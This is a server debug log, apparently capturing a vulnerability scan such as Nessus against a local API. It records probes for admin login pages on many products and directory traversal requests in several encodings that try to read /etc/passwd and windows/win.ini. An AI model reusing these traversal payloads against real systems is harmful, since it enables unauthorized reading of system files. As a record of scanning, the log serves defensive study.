0] GET:/api/properties/configuration.php?tab=Status, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:35.977Z debug: [1667344895977, duration: 0] GET:/api/header.php?tab=status, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:36.015Z debug: [1667344896013, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:36.022Z debug: [1667344896021, duration: 1] GET:/api/aboutprinter.html, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:36.029Z debug: [1667344896028, duration: 1] GET:/api/properties/configuration.php?tab=Status, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:36.063Z debug: [1667344896061, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:36.069Z debug: [1667344896067, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:36.084Z debug: [1667344896083, duration: 0] HEAD:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:36.091Z debug: [1667344896090, duration: 0] HEAD:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:40.919Z debug: [1667344900917, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:40.948Z debug: [1667344900946, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:40.956Z debug: [1667344900955, duration: 0] GET:/api/login.php, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:40.963Z debug: [1667344900962, duration: 1] GET:/api/this_server/all_settings.shtml, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:40.976Z debug: [1667344900975, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:40.984Z debug: [1667344900983, duration: 0] GET:/api/authenticate/login, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:40.991Z debug: [1667344900991, duration: 0] GET:/api/start.js, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:41.004Z debug: [1667344901000, duration: 1] GET:/api/tmui/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:41.011Z debug: [1667344901010, duration: 0] GET:/api/login, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:41.022Z debug: [1667344901020, duration: 2] GET:/api/netmri/config/userAdmin/login.tdf, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:41.031Z debug: [1667344901030, duration: 1] GET:/api/scgi-bin/platform.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:41.039Z debug: [1667344901038, duration: 1] GET:/api/admin/login.do, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:41.056Z debug: [1667344901055, duration: 1] GET:/api/en/main.js, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:41.066Z debug: [1667344901065, duration: 1] GET:/api/mgmt/login?dest=%2Fmgmt%2Fgui%3Fp%3Dhome&reason=&username=, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:41.076Z debug: [1667344901075, duration: 1] GET:/api/dms2/Login.jsp, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:41.084Z debug: [1667344901084, duration: 0] GET:/api/login, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:41.095Z debug: [1667344901094, duration: 0] GET:/api/home.htm, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:41.104Z debug: [1667344901103, duration: 1] GET:/api/sws/data/sws_data.js, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:41.114Z debug: [1667344901113, duration: 0] GET:/api/wcd/system.xml, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:41.124Z debug: [1667344901123, duration: 1] GET:/api/js/Device.js, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:41.133Z debug: [1667344901132, duration: 0] GET:/api/ptz.htm, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:41.139Z debug: [1667344901139, duration: 0] GET:/api/admin/login.jsp, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:41.147Z debug: [1667344901147, duration: 0] GET:/api/loginMsg.js, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:41.331Z debug: [1667344901329, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:41.338Z debug: [1667344901337, duration: 0] GET:/api/login.html, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:41.370Z debug: [1667344901369, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:41.377Z debug: [1667344901376, duration: 0] GET:/api/Home.do, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:41.431Z debug: [1667344901429, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:41.437Z debug: [1667344901437, duration: 0] GET:/api/check_proxy.html, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:41.474Z debug: [1667344901473, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:41.481Z debug: [1667344901480, duration: 1] GET:/api/admin_ui/mas/ent/login.html, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:41.515Z debug: [1667344901514, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:41.523Z debug: [1667344901522, duration: 0] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:41.548Z debug: [1667344901547, duration: 0] GET:/api/intruvert/jsp/admin/Login.jsp, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:41.564Z debug: [1667344901563, duration: 1] GET:/api/commoncgi/servlet/CCGIServlet?ApHost=PDT_InterScan_NT&CGIAlias=PDT_InterScan_NT&File=logout.htm, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:41.582Z debug: [1667344901581, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:41.588Z debug: [1667344901587, duration: 1] GET:/api/xmldata?item=All, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:41.595Z debug: [1667344901595, duration: 0] GET:/api/upnp/BasicDevice.xml, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:41.603Z debug: [1667344901601, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:41.638Z debug: [1667344901636, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:41.645Z debug: [1667344901644, duration: 0] GET:/api/robots.txt, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:41.651Z debug: [1667344901650, duration: 1] GET:/api/sitemap.xml, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:41.658Z debug: [1667344901657, duration: 1] GET:/api/.cobalt, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:41.666Z debug: [1667344901665, duration: 0] GET:/api/admin.back, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:41.674Z debug: [1667344901673, duration: 0] GET:/api/file, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:41.682Z debug: [1667344901681, duration: 1] GET:/api/wavemaster.internal, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:41.689Z debug: [1667344901688, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:41.691Z debug: [1667344901690, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:41.746Z debug: [1667344901741, duration: 4] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:41.754Z debug: [1667344901753, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:47.154Z debug: [1667344907153, duration: 0] GET:/api/MSWSMTP/Common/Authentication/Logon.aspx, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:51.811Z debug: [1667344911809, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:53.334Z debug: [1667344913333, duration: 1] GET:/api/65a_fOef1Mjn.html, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:53.336Z debug: [1667344913336, duration: 0] GET:/api/65a_fOef1Mjn.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:53.338Z debug: [1667344913338, duration: 0] GET:/api/65a_fOef1Mjn.sh, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:53.341Z debug: [1667344913340, duration: 1] GET:/api/65a_fOef1Mjn.pl, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:53.342Z debug: [1667344913342, duration: 0] GET:/api/65a_fOef1Mjn.inc, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:53.345Z debug: [1667344913344, duration: 0] GET:/api/65a_fOef1Mjn.shtml, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:53.346Z debug: [1667344913345, duration: 1] GET:/api/65a_fOef1Mjn.asp, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:53.348Z debug: [1667344913347, duration: 1] GET:/api/65a_fOef1Mjn.php, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:53.349Z debug: [1667344913349, duration: 0] GET:/api/65a_fOef1Mjn.php3, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:53.351Z debug: [1667344913351, duration: 0] GET:/api/65a_fOef1Mjn.cfm, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:53.353Z debug: [1667344913352, duration: 1] GET:/api/cgi-bin/65a_fOef1Mjn.html, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:53.355Z debug: [1667344913354, duration: 0] GET:/api/cgi-bin/65a_fOef1Mjn.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:53.357Z debug: [1667344913356, duration: 1] GET:/api/cgi-bin/65a_fOef1Mjn.sh, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:53.359Z debug: [1667344913359, duration: 0] GET:/api/cgi-bin/65a_fOef1Mjn.pl, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:53.362Z debug: [1667344913362, duration: 0] GET:/api/cgi-bin/65a_fOef1Mjn.inc, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:53.365Z debug: [1667344913364, duration: 0] GET:/api/cgi-bin/65a_fOef1Mjn.shtml, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:53.366Z debug: [1667344913366, duration: 0] GET:/api/cgi-bin/65a_fOef1Mjn.asp, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:53.368Z debug: [1667344913367, duration: 1] GET:/api/cgi-bin/65a_fOef1Mjn.php, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:53.370Z debug: [1667344913369, duration: 0] GET:/api/cgi-bin/65a_fOef1Mjn.php3, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:53.371Z debug: [1667344913371, duration: 0] GET:/api/cgi-bin/65a_fOef1Mjn.cfm, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:53.373Z debug: [1667344913373, duration: 0] GET:/api/scripts/65a_fOef1Mjn.html, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:53.375Z debug: [1667344913374, duration: 1] GET:/api/scripts/65a_fOef1Mjn.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:53.378Z debug: [1667344913377, duration: 0] GET:/api/scripts/65a_fOef1Mjn.sh, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:53.379Z debug: [1667344913379, duration: 0] GET:/api/scripts/65a_fOef1Mjn.pl, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:53.383Z debug: [1667344913382, duration: 0] GET:/api/scripts/65a_fOef1Mjn.inc, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:53.385Z debug: [1667344913384, duration: 0] GET:/api/scripts/65a_fOef1Mjn.shtml, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:53.386Z debug: [1667344913386, duration: 0] GET:/api/scripts/65a_fOef1Mjn.asp, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:53.389Z debug: [1667344913388, duration: 1] GET:/api/scripts/65a_fOef1Mjn.php, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:53.391Z debug: [1667344913390, duration: 0] GET:/api/scripts/65a_fOef1Mjn.php3, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:53.393Z debug: [1667344913393, duration: 0] GET:/api/scripts/65a_fOef1Mjn.cfm, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:53.439Z debug: [1667344913438, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:53.462Z debug: [1667344913461, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:53.468Z debug: [1667344913468, duration: 0] GET:/api/ext-js/app/common/zld_product_spec.js, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:53.500Z debug: [1667344913497, duration: 3] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:53.506Z debug: [1667344913505, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:53.533Z debug: [1667344913532, duration: 0] TRACE:/api/Nessus539550615.html, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:53.554Z debug: [1667344913552, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:53.560Z debug: [1667344913559, duration: 0] GET:/api/xampp/index.php, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:53.584Z debug: [1667344913583, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:53.590Z debug: [1667344913589, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:53.593Z debug: [1667344913592, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:53.622Z debug: [1667344913621, duration: 0] GET:/api/Wsusadmin/Errors/BrowserSettings.aspx, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:53.675Z debug: [1667344913653, duration: 19] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:53.681Z debug: [1667344913681, duration: 0] GET:/api/nessus345678.html, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:53.708Z debug: [1667344913707, duration: 0] GET:/api/nessus345678.html, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:53.729Z debug: [1667344913728, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:53.736Z debug: [1667344913735, duration: 1] GET:/api/SnoopServlet/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:53.743Z debug: [1667344913742, duration: 1] GET:/api/snoopservlet/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:53.749Z debug: [1667344913748, duration: 1] GET:/api/snoop/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:53.755Z debug: [1667344913754, duration: 1] GET:/api/servlet/SnoopServlet/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:53.762Z debug: [1667344913761, duration: 0] GET:/api/servlet/snoopservlet/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:53.768Z debug: [1667344913767, duration: 0] GET:/api/servlet/snoop/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:53.816Z debug: [1667344913814, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:53.823Z debug: [1667344913822, duration: 1] GET:/api/robots.txt, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:53.854Z debug: [1667344913854, duration: 0] GET:/api/favicon.ico, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:53.894Z debug: [1667344913891, duration: 3] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:53.901Z debug: [1667344913900, duration: 0] GET:/api/triton-help/en/first.htm, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:53.929Z debug: [1667344913928, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:53.936Z debug: [1667344913935, duration: 1] GET:/api/console/login/LoginForm.jsp, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:53.943Z debug: [1667344913942, duration: 0] GET:/api/wls-wsat/CoordinatorPortType, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:53.972Z debug: [1667344913971, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:53.978Z debug: [1667344913977, duration: 1] SEARCH:/api/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:54.004Z debug: [1667344914002, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:54.038Z debug: [1667344914035, duration: 3] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:54.044Z debug: [1667344914044, duration: 0] PROPFIND:/api/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:54.071Z debug: [1667344914071, duration: 0] GET:/api/usage/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:54.073Z debug: [1667344914073, duration: 0] GET:/api/webalizer/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:54.096Z debug: [1667344914095, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:54.183Z debug: [1667344914182, duration: 1] GET:/api/.%7C./.%7C./.%7C./.%7C./.%7C./.%7C./.%7C./.%7C./.%7C./.%7C./.%7C./windows/win.ini, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:54.190Z debug: [1667344914189, duration: 0] GET:/api/.%7C./.%7C./.%7C./.%7C./.%7C./.%7C./.%7C./.%7C./.%7C./.%7C./.%7C./winnt/win.ini, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:54.228Z debug: [1667344914227, duration: 0] GET:/api/.../.../.../.../.../.../.../.../.../windows/win.ini, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:54.234Z debug: [1667344914233, duration: 0] GET:/api/.../.../.../.../.../.../.../.../.../winnt/win.ini, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:54.242Z debug: [1667344914241, duration: 1] GET:/api/.../.../.../.../.../.../.../.../.../windows/win.ini, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:54.250Z debug: [1667344914249, duration: 1] GET:/api/.../.../.../.../.../.../.../.../.../winnt/win.ini, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:54.258Z debug: [1667344914258, duration: 0] GET:/api/..../..../..../..../..../..../..../..../..../windows/win.ini, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:54.266Z debug: [1667344914265, duration: 1] GET:/api/..../..../..../..../..../..../..../..../..../winnt/win.ini, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:54.274Z debug: [1667344914272, duration: 1] GET:/api/..../..../..../..../..../..../..../..../..../windows/win.ini, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:54.280Z debug: [1667344914279, duration: 1] GET:/api/..../..../..../..../..../..../..../..../..../winnt/win.ini, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:54.318Z debug: [1667344914317, duration: 0] GET:/api/%E2%82%AC../%E2%82%AC../%E2%82%AC../%E2%82%AC../%E2%82%AC../%E2%82%AC../windows/win.ini, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:54.325Z debug: [1667344914324, duration: 0] GET:/api/%E2%82%AC../%E2%82%AC../%E2%82%AC../%E2%82%AC../%E2%82%AC../%E2%82%AC../winnt/win.ini, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:54.332Z debug: [1667344914332, duration: 0] GET:/api/%C3%80.%C3%80./%C3%80.%C3%80./%C3%80.%C3%80./%C3%80.%C3%80./%C3%80.%C3%80./windows/win.ini, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:54.339Z debug: [1667344914339, duration: 0] GET:/api/%C3%80.%C3%80./%C3%80.%C3%80./%C3%80.%C3%80./%C3%80.%C3%80./%C3%80.%C3%80./winnt/win.ini, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:54.345Z debug: [1667344914345, duration: 0] GET:/api/%C3%80.%C3%80./%C3%80.%C3%80./%C3%80.%C3%80./%C3%80.%C3%80./windows/win.ini, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:54.353Z debug: [1667344914352, duration: 1] GET:/api/%C3%80.%C3%80./%C3%80.%C3%80./%C3%80.%C3%80./%C3%80.%C3%80./winnt/win.ini, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:54.371Z debug: [1667344914370, duration: 0] GET:/api/scripts/fake.cgi?arg=/dir/../../../../../../../../../../../windows/win.ini, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:54.377Z debug: [1667344914376, duration: 1] GET:/api/scripts/fake.cgi?arg=/dir/../../../../../../../../../../../winnt/win.ini, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:54.383Z debug: [1667344914382, duration: 0] GET:/api/scripts/fake.cgi?arg=/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:54.388Z debug: [1667344914388, duration: 0] GET:/api/scripts/fake.cgi?arg=/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/winnt/win.ini, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:54.410Z debug: [1667344914409, duration: 1] GET:/api/..../..../..../..../..../..../..../..../..../..../..../..../etc/passwd, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:54.449Z debug: [1667344914448, duration: 0] GET:/api/scripts/fake.cgi?arg=/dir/../../../../../../etc/passwd, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:54.455Z debug: [1667344914454, duration: 1] GET:/api/scripts/fake.cgi?arg=/dir/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:54.777Z debug: [1667344914775, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:54.818Z debug: [1667344914816, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:54.850Z debug: [1667344914849, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:54.857Z debug: [1667344914857, duration: 0] GET:/api/images, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:54.883Z debug: [1667344914882, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:54.890Z debug: [1667344914890, duration: 0] GET:/api/main_internet.php, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:54.920Z debug: [1667344914918, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:54.926Z debug: [1667344914925, duration: 0] GET:/api/auth/login, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:54.954Z debug: [1667344914953, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:54.960Z debug: [1667344914960, duration: 0] GET:/api/cfg/shortcuts, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:54.967Z debug: [1667344914966, duration: 1] GET:/api/hc/error/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:54.998Z debug: [1667344914996, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:55.006Z debug: [1667344915005, duration: 0] GET:/api/ui/login.action, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:55.034Z debug: [1667344915032, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:55.043Z debug: [1667344915043, duration: 0] GET:/api/login, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:55.085Z debug: [1667344915083, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:55.092Z debug: [1667344915092, duration: 0] GET:/api/hc/admin/login/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:55.127Z debug: [1667344915126, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:55.135Z debug: [1667344915134, duration: 0] GET:/api/login, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:55.166Z debug: [1667344915165, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:55.173Z debug: [1667344915173, duration: 0] GET:/api/qip, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:55.179Z debug: [1667344915179, duration: 0] GET:/api/qip, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:55.210Z debug: [1667344915209, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:55.217Z debug: [1667344915216, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:55.244Z debug: [1667344915243, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:55.250Z debug: [1667344915249, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:55.279Z debug: [1667344915277, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:55.285Z debug: [1667344915284, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:55.309Z debug: [1667344915307, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:55.314Z debug: [1667344915314, duration: 0] GET:/api/portal/diag/index.jsp, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:55.337Z debug: [1667344915336, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:55.344Z debug: [1667344915343, duration: 0] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:55.379Z debug: [1667344915378, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:55.386Z debug: [1667344915385, duration: 1] GET:/api/menu.htm, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:55.412Z debug: [1667344915411, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:55.418Z debug: [1667344915417, duration: 0] HEAD:/api/someunexistantstuff1619473831137079113.html, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:55.420Z debug: [1667344915419, duration: 1] HEAD:/api/someunexistantstuff.exe, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:55.423Z debug: [1667344915423, duration: 0] GET:/api/someunexistantantsutff15360146961725987083.html, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:55.429Z debug: [1667344915428, duration: 1] GET:/api/someunexistantantsutff.exe, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:56.847Z debug: [1667344916845, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:56.853Z debug: [1667344916852, duration: 0] GET:/api/auth/login, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:56.881Z debug: [1667344916880, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:56.888Z debug: [1667344916888, duration: 0] GET:/api/ui/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:56.894Z debug: [1667344916894, duration: 0] GET:/api/ui/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:56.901Z debug: [1667344916899, duration: 1] GET:/api/recoveryconsole/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:56.933Z debug: [1667344916931, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:56.939Z debug: [1667344916938, duration: 1] GET:/api/VncViewer.jar, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:56.967Z debug: [1667344916966, duration: 1] POST:/api/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:56.990Z debug: [1667344916988, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:56.998Z debug: [1667344916995, duration: 2] GET:/api/user/index.php, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:57.033Z debug: [1667344917032, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:57.046Z debug: [1667344917044, duration: 1] GET:/api/pages/login.php, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:57.096Z debug: [1667344917091, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:57.108Z debug: [1667344917108, duration: 0] GET:/api/login.html, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:57.161Z debug: [1667344917159, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:57.172Z debug: [1667344917170, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:57.225Z debug: [1667344917223, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:57.235Z debug: [1667344917234, duration: 0] GET:/api/logon.jsp, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:57.263Z debug: [1667344917261, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:57.272Z debug: [1667344917271, duration: 0] GET:/api/officescan/console/html/common/l10n/l10n.global.js, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:57.298Z debug: [1667344917297, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:57.304Z debug: [1667344917303, duration: 1] GET:/api/webapp/js/UI_String.en-US.js, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:57.334Z debug: [1667344917333, duration: 1] GET:/api/index.asp/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:57.336Z debug: [1667344917336, duration: 0] GET:/api/default.asp/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:57.338Z debug: [1667344917338, duration: 0] GET:/api/login.asp/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:21:57.363Z debug: [1667344917362, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:21:57.369Z debug: [1667344917369, duration: 0] 